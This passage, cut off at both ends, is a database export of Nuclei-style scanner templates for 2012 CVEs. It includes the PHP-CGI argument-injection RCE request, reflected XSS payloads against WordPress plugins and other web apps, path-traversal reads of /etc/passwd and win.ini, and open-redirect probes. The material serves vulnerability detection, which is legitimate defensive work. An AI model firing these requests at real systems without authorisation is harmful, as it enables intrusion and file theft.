high\n description: |\n sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n impact: |\n Remote code execution\n remediation: |\n Upgrade to a patched version of PHP or apply the necessary security patches.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1823\n - https://bugs.php.net/bug.php?id=61910\n - http://www.php.net/ChangeLog-5.php#5.4.2\n - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2012-1823\n cwe-id: CWE-20\n epss-score: 0.97491\n epss-percentile: 0.99972\n cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: php\n product: php\n tags: cve,cve2012,kev,vulhub,rce,php\n\nhttp:\n - raw:\n - |\n POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n \n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"3d638155445bffb044eec401381ad784\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950", "hash": "ac6aa47f8b2e0f2349ffffdf9802d687", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eee" }, "name": "CVE-2012-1835.yaml", "content": "id: CVE-2012-1835\n\ninfo:\n name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-1835\n - https://www.htbridge.com/advisory/HTB23082\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-1835\n cwe-id: CWE-79\n epss-score: 0.01124\n epss-percentile: 0.84313\n cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: timely\n product: all-in-one_event_calendar\n google-query: inurl:\"/wp-content/plugins/all-in-one-event-calendar\"\n tags: cve,cve2012,wordpress,xss,wp-plugin,timely\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'All-in-One Event Calendar'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950", "hash": "25e22e892d5a2e4492c6a0f3ca380899", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eef" }, "name": "CVE-2012-2371.yaml", "content": "id: CVE-2012-2371\n\ninfo:\n name: WP-FaceThumb 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-2371\n - http://www.openwall.com/lists/oss-security/2012/05/15/12\n - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html\n - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79\n - http://www.openwall.com/lists/oss-security/2012/05/16/1\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-2371\n cwe-id: CWE-79\n epss-score: 0.01345\n epss-percentile: 0.85828\n cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mnt-tech\n product: wp-facethumb\n tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP-FaceThumb ==='\n\n - method: GET\n path:\n - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950", "hash": "d8d95b26d9e4a28844c91c8ebeb92760", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef0" }, "name": "CVE-2012-3153.yaml", "content": "id: CVE-2012-3153\n\ninfo:\n name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)\n author: Sid Ahmed MALAOUI @ Realistic Security\n severity: medium\n description: |\n An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\n vectors related to Report Server Component.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution.\n remediation: |\n Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-3152\n - https://www.exploit-db.com/exploits/31737\n - https://www.oracle.com/security-alerts/cpuoct2012.html\n - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\n - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2012-3153\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.95986\n epss-percentile: 0.99354\n cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: fusion_middleware\n tags: cve,cve2012,oracle,rce,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/reports/rwservlet/showenv\"\n - \"{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_1, \"Reports Servlet\")'\n\n - type: dsl\n dsl:\n - '!contains(body_2, \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950", "hash": "9c504f4b283b4aeca7551203377267b1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef3" }, "name": "CVE-2012-4253.yaml", "content": "id: CVE-2012-4253\n\ninfo:\n name: MySQLDumper 1.24.4 - Directory Traversal\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37129\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4253\n - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4253\n cwe-id: CWE-22\n epss-score: 0.0179\n epss-percentile: 0.87805\n cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mysqldumper\n product: mysqldumper\n tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950", "hash": "0745a0f9107a500e375565b0c2754640", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef4" }, "name": "CVE-2012-4273.yaml", "content": "id: CVE-2012-4273\n\ninfo:\n name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4273\n - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798\n - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/\n - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/75518\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4273\n cwe-id: CWE-79\n epss-score: 0.00252\n epss-percentile: 0.64486\n cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ppfeufer\n product: 2-click-social-media-buttons\n google-query: inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"\n tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '2 Click Social Media Buttons'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950", "hash": "181d2c67a7fa04e9d4b9283ac27ceb47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef5" }, "name": "CVE-2012-4547.yaml", "content": "id: CVE-2012-4547\n\ninfo:\n name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\n impact: |\n Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter.\n reference:\n - https://www.exploit-db.com/exploits/36164\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4547\n - http://awstats.sourceforge.net/docs/awstats_changelog.txt\n - http://openwall.com/lists/oss-security/2012/10/29/7\n - http://openwall.com/lists/oss-security/2012/10/26/1\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4547\n cwe-id: CWE-79\n epss-score: 0.0023\n epss-percentile: 0.61246\n cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: laurent_destailleur\n product: awstats\n tags: cve2012,cve,xss,awstats,edb,laurent_destailleur\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950", "hash": "4049959e32d5dce198562c7c3656a71b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef6" }, "name": "CVE-2012-4768.yaml", "content": "id: CVE-2012-4768\n\ninfo:\n name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4768\n - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt\n - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4768\n cwe-id: CWE-79\n epss-score: 0.00922\n epss-percentile: 0.82559\n cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mikejolley\n product: download_monitor\n framework: wordpress\n tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Download Monitor ='\n\n - method: GET\n path:\n - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950", "hash": "ad9cbb3fa1b4f6f35f89eb2925d45f75", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef7" }, "name": "CVE-2012-4878.yaml", "content": "id: CVE-2012-4878\n\ninfo:\n name: FlatnuX CMS - Directory Traversal\n author: daffainfo\n severity: medium\n description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.\n impact: |\n An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS.\n reference:\n - https://www.exploit-db.com/exploits/37034\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4878\n - http://www.vulnerability-lab.com/get_content.php?id=487\n - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-4878\n cwe-id: CWE-22\n epss-score: 0.00608\n epss-percentile: 0.7813\n cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flatnux\n product: flatnux\n tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950", "hash": "39433ed18047b672f10d46dde94cc5bf", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef8" }, "name": "CVE-2012-4889.yaml", "content": "id: CVE-2012-4889\n\ninfo:\n name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4889\n - http://packetstormsecurity.org/files/111474/VL-437.txt\n - http://www.vulnerability-lab.com/get_content.php?id=437\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4889\n cwe-id: CWE-79\n epss-score: 0.03526\n epss-percentile: 0.91352\n cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: manageengine\n product: firewall_analyzer\n tags: cve,cve2012,xss,manageengine,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950", "hash": "d77de71301e990068b38f25dd1d8210a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef9" }, "name": "CVE-2012-4940.yaml", "content": "id: CVE-2012-4940\n\ninfo:\n name: Axigen Mail Server Filename Directory Traversal\n author: dhiyaneshDk\n severity: medium\n description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.\n impact: |\n An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server.\n reference:\n - https://www.exploit-db.com/exploits/37996\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4940\n - http://www.kb.cert.org/vuls/id/586556\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2012-4940\n cwe-id: CWE-22\n epss-score: 0.16414\n epss-percentile: 0.95527\n cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gecad\n product: axigen_free_mail_server\n tags: cve,cve2012,edb,axigen,lfi,mail,gecad\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini'\n - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a004630440220135dfc4a7ae9664bb15c696ab57100ebe3aac536a3149a7c2e85379d9c2385b802202532abf6841721c06135ae12e7fa664254438c6abe917cf0d2b6d7bec3372034:922c64590222798bb761d5b6d8e72950", "hash": "0a5abcc83f3c0962f9f6746643fa52b5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efa" }, "name": "CVE-2012-4982.yaml", "content": "id: CVE-2012-4982\n\ninfo:\n name: Forescout CounterACT 6.3.4.1 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/38062\n - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4982\n - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-4982\n cwe-id: CWE-20\n epss-score: 0.00357\n epss-percentile: 0.71561\n cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: forescout\n product: counteract\n tags: cve,cve2012,redirect,forescout,counteract\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/login?a=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950", "hash": "2eb7a91258c3fa3fc8b351defb5dab78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efb" }, "name": "CVE-2012-5321.yaml", "content": "id: CVE-2012-5321\n\ninfo:\n name: TikiWiki CMS Groupware v8.3 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka \"frame injection\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-5321\n - https://www.exploit-db.com/exploits/36848\n - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-5321\n cwe-id: CWE-20\n epss-score: 0.01926\n epss-percentile: 0.87386\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:8.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n shodan-query: http.html:\"tiki wiki\"\n tags: cve,cve2012,redirect,tikiwiki,groupware,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950", "hash": "063e2392f26d0773e1897f95825946b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efc" }, "name": "CVE-2012-5913.yaml", "content": "id: CVE-2012-5913\n\ninfo:\n name: WordPress Integrator 1.32 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.\n impact: |\n Successful exploitation of this 